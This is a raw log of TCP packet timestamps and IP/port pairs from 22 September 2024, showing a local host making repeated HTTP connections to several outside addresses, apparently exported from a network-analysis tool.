                                                                Sep 22, 2024 17:43:01.292587996 CEST4975580192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:43:02.328603983 CEST4975580192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:43:02.333518028 CEST80497553.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:43:03.348246098 CEST4975680192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:43:03.353125095 CEST80497563.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:43:03.353209972 CEST4975680192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:43:03.361098051 CEST4975680192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:43:03.365937948 CEST80497563.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:43:03.818226099 CEST80497563.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:43:03.818258047 CEST80497563.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:43:03.818397999 CEST4975680192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:43:03.821023941 CEST4975680192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:43:03.825898886 CEST80497563.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:43:08.895410061 CEST4975780192.168.2.684.32.84.32
                                                                Sep 22, 2024 17:43:08.900316954 CEST804975784.32.84.32192.168.2.6
                                                                Sep 22, 2024 17:43:08.900396109 CEST4975780192.168.2.684.32.84.32
                                                                Sep 22, 2024 17:43:08.912022114 CEST4975780192.168.2.684.32.84.32
                                                                Sep 22, 2024 17:43:08.917182922 CEST804975784.32.84.32192.168.2.6
                                                                Sep 22, 2024 17:43:09.533987999 CEST804975784.32.84.32192.168.2.6
                                                                Sep 22, 2024 17:43:09.537065983 CEST4975780192.168.2.684.32.84.32
                                                                Sep 22, 2024 17:43:10.422405958 CEST4975780192.168.2.684.32.84.32
                                                                Sep 22, 2024 17:43:10.490780115 CEST804975784.32.84.32192.168.2.6
                                                                Sep 22, 2024 17:43:11.443983078 CEST4975880192.168.2.684.32.84.32
                                                                Sep 22, 2024 17:43:11.460285902 CEST804975884.32.84.32192.168.2.6
                                                                Sep 22, 2024 17:43:11.462013960 CEST4975880192.168.2.684.32.84.32
                                                                Sep 22, 2024 17:43:11.473912954 CEST4975880192.168.2.684.32.84.32
                                                                Sep 22, 2024 17:43:11.487067938 CEST804975884.32.84.32192.168.2.6
                                                                Sep 22, 2024 17:43:11.970674992 CEST804975884.32.84.32192.168.2.6
                                                                Sep 22, 2024 17:43:11.972871065 CEST4975880192.168.2.684.32.84.32
                                                                Sep 22, 2024 17:43:12.985003948 CEST4975880192.168.2.684.32.84.32
                                                                Sep 22, 2024 17:43:12.990663052 CEST804975884.32.84.32192.168.2.6
                                                                Sep 22, 2024 17:43:14.006037951 CEST4975980192.168.2.684.32.84.32
                                                                Sep 22, 2024 17:43:14.022264004 CEST804975984.32.84.32192.168.2.6
                                                                Sep 22, 2024 17:43:14.024497032 CEST4975980192.168.2.684.32.84.32
                                                                Sep 22, 2024 17:43:14.037590981 CEST4975980192.168.2.684.32.84.32
                                                                Sep 22, 2024 17:43:14.050174952 CEST804975984.32.84.32192.168.2.6
                                                                Sep 22, 2024 17:43:14.052251101 CEST804975984.32.84.32192.168.2.6
                                                                Sep 22, 2024 17:43:14.625106096 CEST804975984.32.84.32192.168.2.6
                                                                Sep 22, 2024 17:43:14.625294924 CEST4975980192.168.2.684.32.84.32
                                                                Sep 22, 2024 17:43:15.566499949 CEST4975980192.168.2.684.32.84.32
                                                                Sep 22, 2024 17:43:15.572830915 CEST804975984.32.84.32192.168.2.6
                                                                Sep 22, 2024 17:43:16.597408056 CEST4976080192.168.2.684.32.84.32
                                                                Sep 22, 2024 17:43:16.622998953 CEST804976084.32.84.32192.168.2.6
                                                                Sep 22, 2024 17:43:16.623148918 CEST4976080192.168.2.684.32.84.32
                                                                Sep 22, 2024 17:43:16.630333900 CEST4976080192.168.2.684.32.84.32
                                                                Sep 22, 2024 17:43:16.649429083 CEST804976084.32.84.32192.168.2.6
                                                                Sep 22, 2024 17:43:17.125127077 CEST804976084.32.84.32192.168.2.6
                                                                Sep 22, 2024 17:43:17.125184059 CEST804976084.32.84.32192.168.2.6
                                                                Sep 22, 2024 17:43:17.125221014 CEST804976084.32.84.32192.168.2.6
                                                                Sep 22, 2024 17:43:17.125252962 CEST804976084.32.84.32192.168.2.6
                                                                Sep 22, 2024 17:43:17.125288010 CEST804976084.32.84.32192.168.2.6
                                                                Sep 22, 2024 17:43:17.125319958 CEST804976084.32.84.32192.168.2.6
                                                                Sep 22, 2024 17:43:17.125329971 CEST4976080192.168.2.684.32.84.32
                                                                Sep 22, 2024 17:43:17.125355005 CEST4976080192.168.2.684.32.84.32
                                                                Sep 22, 2024 17:43:17.125359058 CEST804976084.32.84.32192.168.2.6
                                                                Sep 22, 2024 17:43:17.125392914 CEST4976080192.168.2.684.32.84.32
                                                                Sep 22, 2024 17:43:17.125689030 CEST804976084.32.84.32192.168.2.6
                                                                Sep 22, 2024 17:43:17.125726938 CEST804976084.32.84.32192.168.2.6
                                                                Sep 22, 2024 17:43:17.125735998 CEST4976080192.168.2.684.32.84.32
                                                                Sep 22, 2024 17:43:17.126962900 CEST804976084.32.84.32192.168.2.6
                                                                Sep 22, 2024 17:43:17.127229929 CEST4976080192.168.2.684.32.84.32
                                                                Sep 22, 2024 17:43:17.130295992 CEST4976080192.168.2.684.32.84.32
                                                                Sep 22, 2024 17:43:17.135210037 CEST804976084.32.84.32192.168.2.6
                                                                Sep 22, 2024 17:43:22.601246119 CEST4976180192.168.2.6194.58.112.174
                                                                Sep 22, 2024 17:43:22.607862949 CEST8049761194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:22.607959986 CEST4976180192.168.2.6194.58.112.174
                                                                Sep 22, 2024 17:43:22.618366957 CEST4976180192.168.2.6194.58.112.174
                                                                Sep 22, 2024 17:43:22.625011921 CEST8049761194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:23.348138094 CEST8049761194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:23.348417997 CEST8049761194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:23.348432064 CEST8049761194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:23.348623037 CEST4976180192.168.2.6194.58.112.174
                                                                Sep 22, 2024 17:43:23.348671913 CEST8049761194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:23.348716021 CEST4976180192.168.2.6194.58.112.174
                                                                Sep 22, 2024 17:43:23.349514961 CEST8049761194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:23.349565029 CEST4976180192.168.2.6194.58.112.174
                                                                Sep 22, 2024 17:43:24.125374079 CEST4976180192.168.2.6194.58.112.174
                                                                Sep 22, 2024 17:43:25.144355059 CEST4976280192.168.2.6194.58.112.174
                                                                Sep 22, 2024 17:43:25.154989958 CEST8049762194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:25.156923056 CEST4976280192.168.2.6194.58.112.174
                                                                Sep 22, 2024 17:43:25.167112112 CEST4976280192.168.2.6194.58.112.174
                                                                Sep 22, 2024 17:43:25.176717997 CEST8049762194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:25.880189896 CEST8049762194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:25.880244017 CEST8049762194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:25.880319118 CEST8049762194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:25.880333900 CEST4976280192.168.2.6194.58.112.174
                                                                Sep 22, 2024 17:43:25.880354881 CEST8049762194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:25.880408049 CEST4976280192.168.2.6194.58.112.174
                                                                Sep 22, 2024 17:43:25.880415916 CEST8049762194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:25.880459070 CEST4976280192.168.2.6194.58.112.174
                                                                Sep 22, 2024 17:43:26.672316074 CEST4976280192.168.2.6194.58.112.174
                                                                Sep 22, 2024 17:43:27.691653967 CEST4976380192.168.2.6194.58.112.174
                                                                Sep 22, 2024 17:43:27.696521044 CEST8049763194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:27.696882010 CEST4976380192.168.2.6194.58.112.174
                                                                Sep 22, 2024 17:43:27.706856012 CEST4976380192.168.2.6194.58.112.174
                                                                Sep 22, 2024 17:43:27.711671114 CEST8049763194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:27.711755037 CEST8049763194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:28.381593943 CEST8049763194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:28.381612062 CEST8049763194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:28.381623983 CEST8049763194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:28.382076979 CEST8049763194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:28.382117033 CEST4976380192.168.2.6194.58.112.174
                                                                Sep 22, 2024 17:43:28.383517027 CEST4976380192.168.2.6194.58.112.174
                                                                Sep 22, 2024 17:43:28.501867056 CEST8049763194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:28.501952887 CEST4976380192.168.2.6194.58.112.174
                                                                Sep 22, 2024 17:43:29.221122980 CEST4976380192.168.2.6194.58.112.174
                                                                Sep 22, 2024 17:43:30.238338947 CEST4976480192.168.2.6194.58.112.174
                                                                Sep 22, 2024 17:43:30.245074034 CEST8049764194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:30.245196104 CEST4976480192.168.2.6194.58.112.174
                                                                Sep 22, 2024 17:43:30.252106905 CEST4976480192.168.2.6194.58.112.174
                                                                Sep 22, 2024 17:43:30.258735895 CEST8049764194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:30.957093000 CEST8049764194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:30.957149029 CEST8049764194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:30.957185030 CEST8049764194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:30.957217932 CEST8049764194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:30.957235098 CEST4976480192.168.2.6194.58.112.174
                                                                Sep 22, 2024 17:43:30.957252979 CEST8049764194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:30.957284927 CEST8049764194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:30.957319021 CEST4976480192.168.2.6194.58.112.174
                                                                Sep 22, 2024 17:43:30.957321882 CEST8049764194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:30.957362890 CEST4976480192.168.2.6194.58.112.174
                                                                Sep 22, 2024 17:43:30.957425117 CEST8049764194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:30.957457066 CEST8049764194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:30.957490921 CEST8049764194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:30.957501888 CEST4976480192.168.2.6194.58.112.174
                                                                Sep 22, 2024 17:43:30.957598925 CEST4976480192.168.2.6194.58.112.174
                                                                Sep 22, 2024 17:43:30.957910061 CEST8049764194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:30.961000919 CEST4976480192.168.2.6194.58.112.174
                                                                Sep 22, 2024 17:43:30.963522911 CEST4976480192.168.2.6194.58.112.174
                                                                Sep 22, 2024 17:43:30.968388081 CEST8049764194.58.112.174192.168.2.6
                                                                Sep 22, 2024 17:43:35.992929935 CEST4976680192.168.2.6188.114.96.3
                                                                Sep 22, 2024 17:43:35.998048067 CEST8049766188.114.96.3192.168.2.6
                                                                Sep 22, 2024 17:43:35.998138905 CEST4976680192.168.2.6188.114.96.3
                                                                Sep 22, 2024 17:43:36.010691881 CEST4976680192.168.2.6188.114.96.3
                                                                Sep 22, 2024 17:43:36.015858889 CEST8049766188.114.96.3192.168.2.6
                                                                Sep 22, 2024 17:43:36.596529007 CEST8049766188.114.96.3192.168.2.6
                                                                Sep 22, 2024 17:43:36.596735001 CEST8049766188.114.96.3192.168.2.6
                                                                Sep 22, 2024 17:43:36.596765995 CEST8049766188.114.96.3192.168.2.6
                                                                Sep 22, 2024 17:43:36.596904039 CEST4976680192.168.2.6188.114.96.3
                                                                Sep 22, 2024 17:43:36.596904039 CEST4976680192.168.2.6188.114.96.3
                                                                Sep 22, 2024 17:43:37.516144991 CEST4976680192.168.2.6188.114.96.3
                                                                Sep 22, 2024 17:43:37.631067038 CEST8049766188.114.96.3192.168.2.6
                                                                Sep 22, 2024 17:43:37.631158113 CEST4976680192.168.2.6188.114.96.3
                                                                Sep 22, 2024 17:43:37.631455898 CEST8049766188.114.96.3192.168.2.6
                                                                Sep 22, 2024 17:43:37.631510973 CEST4976680192.168.2.6188.114.96.3
                                                                Sep 22, 2024 17:43:38.536242008 CEST4976780192.168.2.6188.114.96.3
                                                                Sep 22, 2024 17:43:38.541264057 CEST8049767188.114.96.3192.168.2.6
                                                                Sep 22, 2024 17:43:38.541363001 CEST4976780192.168.2.6188.114.96.3
                                                                Sep 22, 2024 17:43:38.552741051 CEST4976780192.168.2.6188.114.96.3
                                                                Sep 22, 2024 17:43:38.557622910 CEST8049767188.114.96.3192.168.2.6
                                                                Sep 22, 2024 17:43:39.238420963 CEST8049767188.114.96.3192.168.2.6
                                                                Sep 22, 2024 17:43:39.238450050 CEST8049767188.114.96.3192.168.2.6
                                                                Sep 22, 2024 17:43:39.238466024 CEST8049767188.114.96.3192.168.2.6
                                                                Sep 22, 2024 17:43:39.238703966 CEST4976780192.168.2.6188.114.96.3
                                                                Sep 22, 2024 17:43:40.063046932 CEST4976780192.168.2.6188.114.96.3
                                                                Sep 22, 2024 17:43:41.104773998 CEST4976880192.168.2.6188.114.96.3
                                                                Sep 22, 2024 17:43:41.502772093 CEST8049768188.114.96.3192.168.2.6
                                                                Sep 22, 2024 17:43:41.502856016 CEST4976880192.168.2.6188.114.96.3
                                                                Sep 22, 2024 17:43:41.514853954 CEST4976880192.168.2.6188.114.96.3
                                                                Sep 22, 2024 17:43:41.519762993 CEST8049768188.114.96.3192.168.2.6
                                                                Sep 22, 2024 17:43:41.519789934 CEST8049768188.114.96.3192.168.2.6
                                                                Sep 22, 2024 17:43:41.978915930 CEST8049768188.114.96.3192.168.2.6
                                                                Sep 22, 2024 17:43:41.979589939 CEST8049768188.114.96.3192.168.2.6
                                                                Sep 22, 2024 17:43:41.979641914 CEST4976880192.168.2.6188.114.96.3
                                                                Sep 22, 2024 17:43:43.016096115 CEST4976880192.168.2.6188.114.96.3
                                                                Sep 22, 2024 17:43:44.049128056 CEST4976980192.168.2.6188.114.96.3
                                                                Sep 22, 2024 17:43:44.053981066 CEST8049769188.114.96.3192.168.2.6
                                                                Sep 22, 2024 17:43:44.054054022 CEST4976980192.168.2.6188.114.96.3
                                                                Sep 22, 2024 17:43:44.095858097 CEST4976980192.168.2.6188.114.96.3
                                                                Sep 22, 2024 17:43:44.100783110 CEST8049769188.114.96.3192.168.2.6
                                                                Sep 22, 2024 17:43:44.513479948 CEST8049769188.114.96.3192.168.2.6
                                                                Sep 22, 2024 17:43:44.514023066 CEST8049769188.114.96.3192.168.2.6
                                                                Sep 22, 2024 17:43:44.514090061 CEST4976980192.168.2.6188.114.96.3
                                                                Sep 22, 2024 17:43:44.516578913 CEST4976980192.168.2.6188.114.96.3
                                                                Sep 22, 2024 17:43:44.523260117 CEST8049769188.114.96.3192.168.2.6
                                                                Sep 22, 2024 17:43:49.722112894 CEST4977080192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:49.729536057 CEST8049770154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:49.730006933 CEST4977080192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:49.794701099 CEST4977080192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:49.802252054 CEST8049770154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:50.671076059 CEST8049770154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:50.671376944 CEST8049770154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:50.671461105 CEST4977080192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:51.297305107 CEST4977080192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:52.317950010 CEST4977180192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:52.322904110 CEST8049771154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:52.323036909 CEST4977180192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:52.333945036 CEST4977180192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:52.339867115 CEST8049771154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:53.212805986 CEST8049771154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:53.212888002 CEST8049771154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:53.212949991 CEST4977180192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:53.844330072 CEST4977180192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:54.863344908 CEST4977280192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:54.868274927 CEST8049772154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:54.868607044 CEST4977280192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:54.886008024 CEST4977280192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:54.890872002 CEST8049772154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:54.890959024 CEST8049772154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:55.768338919 CEST8049772154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:55.768579960 CEST8049772154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:55.769330025 CEST4977280192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:56.391190052 CEST4977280192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:57.410026073 CEST4977380192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:57.416735888 CEST8049773154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:57.416810989 CEST4977380192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:57.424365997 CEST4977380192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:57.432363987 CEST8049773154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:58.384762049 CEST8049773154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:58.385137081 CEST8049773154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:58.386122942 CEST4977380192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:58.387404919 CEST4977380192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:58.392590046 CEST8049773154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:44:03.434727907 CEST4977480192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:03.439666033 CEST8049774188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:03.439754963 CEST4977480192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:03.450546026 CEST4977480192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:03.455440998 CEST8049774188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:04.958074093 CEST4977480192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:04.963375092 CEST8049774188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:04.963443995 CEST4977480192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:05.972317934 CEST4977580192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:05.979597092 CEST8049775188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:05.979686022 CEST4977580192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:05.990099907 CEST4977580192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:05.995264053 CEST8049775188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:07.500480890 CEST4977580192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:07.505948067 CEST8049775188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:07.506102085 CEST4977580192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:08.519618034 CEST4977680192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:08.524751902 CEST8049776188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:08.524840117 CEST4977680192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:08.535540104 CEST4977680192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:08.540472984 CEST8049776188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:08.541311979 CEST8049776188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:09.519821882 CEST8049776188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:09.519943953 CEST8049776188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:09.520003080 CEST4977680192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:10.047506094 CEST4977680192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:11.075625896 CEST4977780192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:11.081465006 CEST8049777188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:11.081573009 CEST4977780192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:11.090127945 CEST4977780192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:11.097242117 CEST8049777188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:13.085714102 CEST8049777188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:13.085736990 CEST8049777188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:13.085755110 CEST8049777188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:13.085773945 CEST8049777188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:13.085810900 CEST4977780192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:13.085905075 CEST4977780192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:13.086250067 CEST8049777188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:13.086294889 CEST4977780192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:13.088741064 CEST4977780192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:13.093483925 CEST8049777188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:18.153865099 CEST4977880192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:18.158890009 CEST804977881.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:18.160089016 CEST4977880192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:18.172374964 CEST4977880192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:18.177556992 CEST804977881.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:18.834770918 CEST804977881.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:18.834799051 CEST804977881.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:18.834877968 CEST4977880192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:19.672491074 CEST4977880192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:20.700335026 CEST4977980192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:20.705210924 CEST804977981.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:20.705280066 CEST4977980192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:20.717183113 CEST4977980192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:20.722038984 CEST804977981.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:21.376269102 CEST804977981.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:21.376296997 CEST804977981.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:21.376333952 CEST4977980192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:22.219228983 CEST4977980192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:23.238415956 CEST4978080192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:23.243473053 CEST804978081.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:23.243546009 CEST4978080192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:23.255611897 CEST4978080192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:23.260659933 CEST804978081.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:23.260826111 CEST804978081.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:23.911545038 CEST804978081.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:23.911577940 CEST804978081.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:23.911658049 CEST4978080192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:24.766150951 CEST4978080192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:25.784738064 CEST4978180192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:25.789872885 CEST804978181.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:25.790373087 CEST4978180192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:25.798013926 CEST4978180192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:25.802907944 CEST804978181.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:26.464677095 CEST804978181.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:26.464704990 CEST804978181.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:26.464878082 CEST4978180192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:26.467561960 CEST4978180192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:26.472379923 CEST804978181.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:31.525639057 CEST4978280192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:31.530577898 CEST8049782142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:31.530654907 CEST4978280192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:31.541647911 CEST4978280192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:31.558275938 CEST8049782142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:32.248075962 CEST8049782142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:32.248112917 CEST8049782142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:32.248199940 CEST4978280192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:33.047420025 CEST4978280192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:34.066942930 CEST4978380192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:34.071996927 CEST8049783142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:34.074121952 CEST4978380192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:34.086030006 CEST4978380192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:34.090938091 CEST8049783142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:34.898056984 CEST8049783142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:34.898492098 CEST8049783142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:34.898544073 CEST4978380192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:35.598023891 CEST4978380192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:36.613369942 CEST4978480192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:36.618269920 CEST8049784142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:36.618356943 CEST4978480192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:36.628519058 CEST4978480192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:36.633454084 CEST8049784142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:36.633488894 CEST8049784142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:37.366883039 CEST8049784142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:37.367026091 CEST8049784142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:37.367099047 CEST4978480192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:38.141123056 CEST4978480192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:39.160784960 CEST4978680192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:39.166006088 CEST8049786142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:39.166177988 CEST4978680192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:39.174176931 CEST4978680192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:39.179544926 CEST8049786142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:39.890641928 CEST8049786142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:39.890675068 CEST8049786142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:39.893410921 CEST4978680192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:39.904529095 CEST4978680192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:39.909415007 CEST8049786142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:49.589764118 CEST4978780192.168.2.6172.81.61.224
                                                                Sep 22, 2024 17:44:49.597887039 CEST8049787172.81.61.224192.168.2.6
                                                                Sep 22, 2024 17:44:49.598031998 CEST4978780192.168.2.6172.81.61.224
                                                                Sep 22, 2024 17:44:49.605087042 CEST4978780192.168.2.6172.81.61.224
                                                                Sep 22, 2024 17:44:49.612334013 CEST8049787172.81.61.224192.168.2.6
